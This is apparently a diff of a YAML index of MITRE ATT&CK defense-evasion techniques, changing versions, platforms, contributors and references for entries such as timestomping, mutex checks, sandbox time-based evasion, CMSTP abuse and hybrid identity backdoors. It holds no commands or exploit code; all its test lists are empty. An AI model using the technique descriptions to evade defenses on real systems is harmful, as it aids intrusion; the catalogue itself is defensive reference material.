-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
+      - 'Process: OS API Execution'
       - 'File: File Modification'
       - 'File: File Metadata'
+      - 'Command: Command Execution'
       x_mitre_defense_bypassed:
       - Host forensic analysis
-      x_mitre_permissions_required:
-      - root
-      - SYSTEM
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611
+      created: '2020-01-31T12:42:44.103Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1070/006
+        external_id: T1070.006
+      - source_name: WindowsIR Anti-Forensic Techniques
+        description: 'Carvey, H. (2013, July 23). HowTo: Determine/Detect the use
+          of Anti-Forensics Techniques. Retrieved June 3, 2016.'
+        url: http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html
+      - source_name: Inversecos Timestomping 2022
+        description: 'Lina Lau. (2022, April 28). Defence Evasion Technique: Timestomping
+          Detection – NTFS Forensics. Retrieved September 30, 2024.'
+        url: https://www.inversecos.com/2022/04/defence-evasion-technique-timestomping.html
+      - source_name: Magnet Forensics
+        description: Magnet Forensics. (2020, August 24). Expose Evidence of Timestomping
+          with the NTFS Timestamp Mismatch Artifact. Retrieved June 20, 2024.
+        url: https://www.magnetforensics.com/blog/expose-evidence-of-timestomping-with-the-ntfs-timestamp-mismatch-artifact-in-magnet-axiom-4-4/
+      - source_name: Double Timestomping
+        description: Matthew Dunwoody. (2022, April 28). I have seen double-timestomping
+          ITW, including by APT29. Stay sharp out there.. Retrieved June 20, 2024.
+        url: https://x.com/matthewdunwoody/status/1519846657646604289
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1070.006
     atomic_tests: []
   T1620:
@@ -4134,9 +4219,76 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1620
     atomic_tests: []
+  T1480.002:
+    technique:
+      modified: '2024-10-28T16:22:25.431Z'
+      name: Mutual Exclusion
+      description: |-
+        Adversaries may constrain execution or actions based on the presence of a mutex associated with malware. A mutex is a locking mechanism used to synchronize access to a resource. Only one thread or process can acquire a mutex at a given time.(Citation: Microsoft Mutexes)
+
+        While local mutexes only exist within a given process, allowing multiple threads to synchronize access to a resource, system mutexes can be used to synchronize the activities of multiple processes.(Citation: Microsoft Mutexes) By creating a unique system mutex associated with a particular malware, adversaries can verify whether or not a system has already been compromised.(Citation: Sans Mutexes 2012)
+
+        In Linux environments, malware may instead attempt to acquire a lock on a mutex file. If the malware is able to acquire the lock, it continues to execute; if it fails, it exits to avoid creating a second instance of itself.(Citation: Intezer RedXOR 2021)(Citation: Deep Instinct BPFDoor 2023)
+
+        Mutex names may be hard-coded or dynamically generated using a predictable algorithm.(Citation: ICS Mutexes 2015)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Manikantan Srinivasan, NEC Corporation India
+      - Pooja Natarajan, NEC Corporation India
+      - Nagahama Hiroki – NEC Corporation Japan
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      - Linux
+      - macOS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Process: OS API Execution'
+      - 'File: File Creation'
+      type: attack-pattern
+      id: attack-pattern--49fca0d2-685d-41eb-8bd4-05451cc3a742
+      created: '2024-09-19T14:00:03.401Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1480/002
+        external_id: T1480.002
+      - source_name: Intezer RedXOR 2021
+        description: Joakim Kennedy and Avigayil Mechtinger. (2021, March 10). New
+          Linux Backdoor RedXOR Likely Operated by Chinese Nation-State Actor. Retrieved
+          September 19, 2024.
+        url: https://intezer.com/blog/malware-analysis/new-linux-backdoor-redxor-likely-operated-by-chinese-nation-state-actor/
+      - source_name: Sans Mutexes 2012
+        description: Lenny Zeltser. (2012, July 24). Looking at Mutex Objects for
+          Malware Discovery & Indicators of Compromise. Retrieved September 19, 2024.
+        url: https://www.sans.org/blog/looking-at-mutex-objects-for-malware-discovery-indicators-of-compromise/
+      - source_name: ICS Mutexes 2015
+        description: Lenny Zeltser. (2015, March 9). How Malware Generates Mutex Names
+          to Evade Detection. Retrieved September 19, 2024.
+        url: https://isc.sans.edu/diary/How+Malware+Generates+Mutex+Names+to+Evade+Detection/19429/
+      - source_name: Microsoft Mutexes
+        description: Microsoft. (2022, March 11). Mutexes. Retrieved September 19,
+          2024.
+        url: https://learn.microsoft.com/en-us/dotnet/standard/threading/mutexes
+      - source_name: Deep Instinct BPFDoor 2023
+        description: Shaul Vilkomir-Preisman and Eliran Nissan. (2023, May 10). BPFDoor
+          Malware Evolves – Stealthy Sniffing Backdoor Ups Its Game. Retrieved September
+          19, 2024.
+        url: https://www.deepinstinct.com/blog/bpfdoor-malware-evolves-stealthy-sniffing-backdoor-ups-its-game
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1564.011:
     technique:
       modified: '2023-11-06T20:14:51.609Z'
@@ -4200,57 +4352,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1497.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Jorge Orchilles, SCYTHE
-      - Ruben Dodge, @shotgunner101
-      - Jeff Felling, Red Canary
-      - Deloitte Threat Library Team
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
-      type: attack-pattern
-      created: '2020-03-06T21:11:11.225Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1497.003
-        url: https://attack.mitre.org/techniques/T1497/003
-      - source_name: Deloitte Environment Awareness
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
-        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-      - source_name: Revil Independence Day
-        url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
-        description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
-          supply chain exploit to attack hundreds of businesses. Retrieved September
-          30, 2021.'
-      - source_name: Netskope Nitol
-        url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
-        description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
-          with evasive sandbox analysis technique. Retrieved September 30, 2021.
-      - source_name: Joe Sec Nymaim
-        url: https://www.joesecurity.org/blog/3660886847485093803
-        description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
-          API hammering. Retrieved September 30, 2021.
-      - source_name: Joe Sec Trickbot
-        url: https://www.joesecurity.org/blog/498839998833561473
-        description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
-          Retrieved September 30, 2021.
-      - source_name: ISACA Malware Tricks
-        url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
-        description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
-          Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-09-12T15:50:18.048Z'
       name: Time Based Evasion
       description: |-
         Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.
@@ -4265,6 +4370,12 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Jorge Orchilles, SCYTHE
+      - Ruben Dodge, @shotgunner101
+      - Jeff Felling, Red Canary
+      - Deloitte Threat Library Team
+      x_mitre_deprecated: false
       x_mitre_detection: 'Time-based evasion will likely occur in the first steps
         of an operation but may also occur throughout as an adversary learns the environment.
         Data and events should not be viewed in isolation, but as part of a chain
@@ -4274,9 +4385,14 @@ defense-evasion:
         implementation and monitoring required. Monitoring for suspicious processes
         being spawned that gather a variety of system information or perform other
         forms of Discovery, especially in a short period of time, may aid in detection. '
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
       x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
       - 'Process: Process Creation'
@@ -4286,13 +4402,49 @@ defense-evasion:
       - Signature-based detection
       - Static File Analysis
       - Anti-virus
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
+      created: '2020-03-06T21:11:11.225Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1497/003
+        external_id: T1497.003
+      - source_name: Joe Sec Nymaim
+        description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
+          API hammering. Retrieved September 30, 2021.
+        url: https://www.joesecurity.org/blog/3660886847485093803
+      - source_name: Joe Sec Trickbot
+        description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
+          Retrieved September 30, 2021.
+        url: https://www.joesecurity.org/blog/498839998833561473
+      - source_name: ISACA Malware Tricks
+        description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
+          Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
+        url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
+      - source_name: Revil Independence Day
+        description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
+          supply chain exploit to attack hundreds of businesses. Retrieved September
+          30, 2021.'
+        url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
+      - source_name: Netskope Nitol
+        description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
+          with evasive sandbox analysis technique. Retrieved September 30, 2021.
+        url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
+      - source_name: Deloitte Environment Awareness
+        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1497.003
     atomic_tests: []
   T1218.003:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T19:35:43.077Z'
       name: 'Signed Binary Proxy Execution: CMSTP'
       description: |-
         Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.
@@ -4338,8 +4490,8 @@ defense-evasion:
         external_id: T1218.003
       - source_name: Twitter CMSTP Usage Jan 2018
         description: Carr, N. (2018, January 31). Here is some early bad cmstp.exe...
-          Retrieved April 11, 2018.
-        url: https://twitter.com/ItsReallyNick/status/958789644165894146
+          Retrieved September 12, 2024.
+        url: https://x.com/ItsReallyNick/status/958789644165894146
       - source_name: Microsoft Connection Manager Oct 2009
         description: Microsoft. (2009, October 8). How Connection Manager Works. Retrieved
           April 11, 2018.
@@ -4358,13 +4510,12 @@ defense-evasion:
         url: http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/
       - source_name: Twitter CMSTP Jan 2018
         description: Tyrer, N. (2018, January 30). CMSTP.exe - remote .sct execution
-          applocker bypass. Retrieved April 11, 2018.
-        url: https://twitter.com/NickTyrer/status/958450014111633408
+          applocker bypass. Retrieved September 12, 2024.
+        url: https://x.com/NickTyrer/status/958450014111633408
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1218.003
     atomic_tests: []
   T1562.002:
@@ -4479,7 +4630,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.002
     atomic_tests: []
   T1218.002:
@@ -4520,7 +4670,7 @@ defense-evasion:
         url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
         description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
           HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T19:01:55.821Z'
       name: 'Signed Binary Proxy Execution: Control Panel'
       description: |-
         Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings.
@@ -4559,8 +4709,6 @@ defense-evasion:
       - User
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1218.002
     atomic_tests: []
   T1599.001:
@@ -4583,7 +4731,7 @@ defense-evasion:
         url: https://tools.ietf.org/html/rfc1918
         description: IETF Network Working Group. (1996, February). Address Allocation
           for Private Internets. Retrieved October 20, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-21T01:45:58.951Z'
       name: Network Address Translation Traversal
       description: "Adversaries may bridge network boundaries by modifying a network
         device’s Network Address Translation (NAT) configuration. Malicious modifications
@@ -4622,12 +4770,10 @@ defense-evasion:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1550:
     technique:
-      modified: '2024-04-12T21:18:23.798Z'
+      modified: '2024-10-15T16:09:19.001Z'
       name: Use Alternate Authentication Material
       description: "Adversaries may use alternate authentication material, such as
         password hashes, Kerberos tickets, and application access tokens, in order
@@ -4654,6 +4800,7 @@ defense-evasion:
         phase_name: lateral-movement
       x_mitre_contributors:
       - Blake Strom, Microsoft Threat Intelligence
+      - Pawel Partyka, Microsoft Threat Intelligence
       x_mitre_deprecated: false
       x_mitre_detection: 'Configure robust, consistent account activity audit policies
         across the enterprise and with externally accessible services.(Citation: TechNet
@@ -4671,12 +4818,12 @@ defense-evasion:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
       - IaaS
       - Containers
-      x_mitre_version: '1.3'
+      - Identity Provider
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Logon Session: Logon Session Creation'
@@ -4702,18 +4849,17 @@ defense-evasion:
         description: NIST. (n.d.). Authentication. Retrieved January 30, 2020.
         url: https://csrc.nist.gov/glossary/term/authentication
       - source_name: NIST MFA
-        description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved January
-          30, 2020.
-        url: https://csrc.nist.gov/glossary/term/Multi_Factor-Authentication
+        description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved September
+          25, 2024.
+        url: https://csrc.nist.gov/glossary/term/multi_factor_authentication
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1562.004:
     technique:
-      modified: '2024-03-28T00:01:08.337Z'
+      modified: '2024-09-12T19:37:57.867Z'
       name: 'Impair Defenses: Disable or Modify System Firewall'
       description: |-
         Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel.
@@ -4758,13 +4904,12 @@ defense-evasion:
         url: https://www.huntress.com/blog/blackcat-ransomware-affiliate-ttps
       - source_name: change_rdp_port_conti
         description: 'The DFIR Report. (2022, March 1). "Change RDP port" #ContiLeaks.
-          Retrieved March 1, 2022.'
-        url: https://twitter.com/TheDFIRReport/status/1498657772254240768
+          Retrieved September 12, 2024.'
+        url: https://x.com/TheDFIRReport/status/1498657772254240768
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.004
     atomic_tests: []
   T1553.003:
@@ -4836,7 +4981,7 @@ defense-evasion:
         * **Note:** The above hijacks are also possible without modifying the Registry via [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).
 
         Hijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. (Citation: SpectorOps Subverting Trust Sept 2017)
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-05T04:58:58.214Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Subvert Trust Controls: SIP and Trust Provider Hijacking'
       x_mitre_detection: |-
@@ -4869,35 +5014,34 @@ defense-evasion:
       - Application Control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1553.003
     atomic_tests: []
   T1556.007:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Hybrid Identity
       description: "Adversaries may patch, modify, or otherwise backdoor cloud authentication
         processes that are tied to on-premises user identities in order to bypass
         typical authentication mechanisms, access credentials, and enable persistent
         access to accounts.  \n\nMany organizations maintain hybrid user and device
         identities that are shared between on-premises and cloud-based environments.
-        These can be maintained in a number of ways. For example, Azure AD includes
-        three options for synchronizing identities between Active Directory and Azure
-        AD(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
+        These can be maintained in a number of ways. For example, Microsoft Entra
+        ID includes three options for synchronizing identities between Active Directory
+        and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
         (PHS), in which a privileged on-premises account synchronizes user password
-        hashes between Active Directory and Azure AD, allowing authentication to Azure
-        AD to take place entirely in the cloud \n* Pass Through Authentication (PTA),
-        in which Azure AD authentication attempts are forwarded to an on-premises
+        hashes between Active Directory and Entra ID, allowing authentication to Entra
+        ID to take place entirely in the cloud \n* Pass Through Authentication (PTA),
+        in which Entra ID authentication attempts are forwarded to an on-premises
         PTA agent, which validates the credentials against Active Directory \n* Active
         Directory Federation Services (AD FS), in which a trust relationship is established
-        between Active Directory and Azure AD \n\nAD FS can also be used with other
+        between Active Directory and Entra ID \n\nAD FS can also be used with other
         SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication
         process to AD FS and receive a token containing the hybrid users’ identity
         and privileges. \n\nBy modifying authentication processes tied to hybrid identities,
         an adversary may be able to establish persistent privileged access to cloud
         resources. For example, adversaries who compromise an on-premises server running
         a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService`
-        process that authorizes all attempts to authenticate to Azure AD, as well
+        process that authorizes all attempts to authenticate to Entra ID, as well
         as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation:
         AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary
         may edit the `Microsoft.IdentityServer.Servicehost` configuration file to
@@ -4905,9 +5049,9 @@ defense-evasion:
         any set of claims, thereby bypassing multi-factor authentication and defined
         AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able
         to modify the hybrid identity authentication process from the cloud. For example,
-        adversaries who compromise a Global Administrator account in an Azure AD tenant
+        adversaries who compromise a Global Administrator account in an Entra ID tenant
         may be able to register a new PTA agent via the web console, similarly allowing
-        them to harvest credentials and log into the Azure AD environment as any user.(Citation:
+        them to harvest credentials and log into the Entra ID environment as any user.(Citation:
         Mandiant Azure AD Backdoors)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
@@ -4916,21 +5060,22 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
       - SaaS
-      - Google Workspace
-      - Office 365
       - IaaS
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Praetorian
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Module: Module Load'
@@ -4970,9 +5115,6 @@ defense-evasion:
         url: https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1218.015:
     technique:
@@ -5035,7 +5177,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1562.012:
     technique:
@@ -5095,7 +5236,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.012
     atomic_tests: []
   T1207:
@@ -5136,7 +5276,7 @@ defense-evasion:
         description: Lucand,G. (2018, February 18). Detect DCShadow, impossible?.
           Retrieved March 30, 2018.
         source_name: ADDSecurity DCShadow Feb 2018
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-08T21:20:04.850Z'
       name: Rogue Domain Controller
       description: |-
         Adversaries may register a rogue Domain Controller to enable manipulation of Active Directory data. DCShadow may be used to create a rogue Domain Controller (DC). DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a DC. (Citation: DCShadow Blog) Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys.
@@ -5167,8 +5307,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - Administrator
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1207
     atomic_tests: []
   T1553.006:
@@ -5258,7 +5396,7 @@ defense-evasion:
         Escalation](https://attack.mitre.org/techniques/T1068) using a signed, but
         vulnerable driver.(Citation: Unit42 AcidBox June 2020)(Citation: GitHub Turla
         Driver Loader)"
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-05T05:00:03.480Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Subvert Trust Controls: Code Signing Policy Modification'
       x_mitre_detection: 'Monitor processes and command-line arguments for actions
@@ -5282,12 +5420,11 @@ defense-evasion:
       - Application Control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1553.006
     atomic_tests: []
   T1610:
     technique:
-      modified: '2024-04-11T21:24:42.680Z'
+      modified: '2024-10-15T15:06:17.124Z'
       name: Deploy a container
       description: |-
         Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. In Kubernetes environments, an adversary may attempt to deploy a privileged or vulnerable container into a specific node in order to [Escape to Host](https://attack.mitre.org/techniques/T1611) and access other containers running on the node. (Citation: AppSecco Kubernetes Namespace Breakout 2020)
@@ -5366,7 +5503,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1610
     atomic_tests: []
   T1112:
@@ -5451,12 +5587,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1112
     atomic_tests: []
   T1574.008:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T15:25:57.059Z'
       name: 'Hijack Execution Flow: Path Interception by Search Order Hijacking'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -5475,6 +5610,7 @@ defense-evasion:
         phase_name: defense-evasion
       x_mitre_contributors:
       - Stefan Kanthak
+      x_mitre_deprecated: false
       x_mitre_detection: |
         Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
 
@@ -5482,7 +5618,6 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.0'
@@ -5502,29 +5637,31 @@ defense-evasion:
       id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
       created: '2020-03-13T17:48:58.999Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1574/008
         external_id: T1574.008
+      - source_name: Microsoft Environment Property
+        description: Microsoft. (2011, October 24). Environment Property. Retrieved
+          July 27, 2016.
+        url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
       - source_name: Microsoft CreateProcess
-        description: Microsoft. (n.d.). CreateProcess function. Retrieved December
-          5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms682425
+        description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
+      - source_name: Microsoft WinExec
+        description: Microsoft. (n.d.). WinExec function. Retrieved September 12,
+          2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec
       - source_name: Windows NT Command Shell
